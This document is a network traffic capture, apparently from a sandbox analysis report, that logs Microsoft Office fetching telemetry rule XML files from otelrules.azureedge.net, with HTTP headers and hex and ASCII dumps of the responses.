                                                                                                                                                                                                                                                                                      2024-11-20 09:54:26 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      83192.168.2.64980313.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:26 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:26 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:26 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1952
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B956B0F3D"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 8e68b69a-701e-005c-5c8c-3abb94000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095426Z-1777c6cb7544n7p6hC1TEByvb400000009mg000000004m53
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:26 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      84192.168.2.64980513.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:26 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:26 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 501
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BACFDAACD"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 733c6689-901e-007b-288c-3aac50000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095426Z-185f5d8b95c96jn4hC1NYCbgp80000000a3g00000000519z
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:26 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      85192.168.2.64980713.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:26 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:26 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:26 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 3342
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B927E47E9"
                                                                                                                                                                                                                                                                                      x-ms-request-id: ff95cf15-b01e-0001-328c-3a46e2000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095426Z-185f5d8b95c96jn4hC1NYCbgp80000000a0g00000000c5fb
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:26 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      86192.168.2.64980613.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:26 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:26 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:26 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 2592
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB5B890DB"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 85babd8c-f01e-003f-4e8c-3ad19d000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095426Z-185f5d8b95c68cvnhC1NYCfn7s0000000a30000000005ruq
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:26 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      87192.168.2.64980813.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:27 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:27 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:27 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 2284
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                                                                                                                                                      x-ms-request-id: d35eb2be-501e-0064-3d8c-3a1f54000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095427Z-1777c6cb7544nvmshC1TEBf7qc000000095000000000e1s9
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:27 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      88192.168.2.64980913.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:27 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:27 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:27 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1393
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE3E55B6E"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 6d4f85c2-e01e-0003-2b8c-3a0fa8000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095427Z-185f5d8b95csd4bwhC1NYCq7dc00000009z0000000009nep
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:27 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      89192.168.2.64981013.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:27 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:27 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:27 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1356
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BDC681E17"
                                                                                                                                                                                                                                                                                      x-ms-request-id: c1a1f15b-901e-005b-358c-3a2005000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095427Z-r1d97b99577jlrkbhC1TEBq8d000000008ng000000003usv
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:27 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      90192.168.2.64981113.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:27 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:27 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:27 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1393
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE39DFC9B"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 96e0b134-501e-0035-148c-3ac923000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095427Z-r1d97b99577jlrkbhC1TEBq8d000000008h000000000as95
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:27 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      91192.168.2.64981213.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:27 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:27 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:27 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1356
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
